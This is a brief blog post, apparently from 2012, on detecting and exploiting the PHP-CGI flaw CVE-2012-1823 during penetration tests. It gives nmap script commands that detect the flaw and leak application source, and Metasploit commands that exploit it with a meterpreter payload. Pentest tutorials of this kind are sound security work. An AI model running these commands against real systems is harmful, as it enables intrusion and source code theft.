Detecting and exploiting vulnerable PHP-CGI applications
A critical vulnerability affecting PHP applications which use the CGI interprerter was published at the beginning of this month (http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/). This vulnerability leaks the source code of the application and allows remote code execution.
To detect vulnerable applications during a pentest, we can use the NSE script “http-cve2012-1823”:
$nmap -p80 --script http-cve2012-1823 target
To get the source code of another application you can use the “uri” parameter:
$nmap -p80 --script http-cve2012-1823 --script-args uri=/login.php IP
Here you can watch a video demonstrating the process detection of vulnerable PHP-CGI applications.
This script was sent to Nmap's official repository with revision ID “28545” and should be available soon. In the meantime you can download it at:
The Metasploit project has contributed a module to help exploit this vulnerability. In order to do so:
> use exploit/multi/http/php_cgi_arg_injection
> set rhost IP
> set PAYLOAD php/meterpreter/bind_tcp
Here you can watch a video demonstrating the process exploitation of vulnerable PHP-CGI applications using MSF.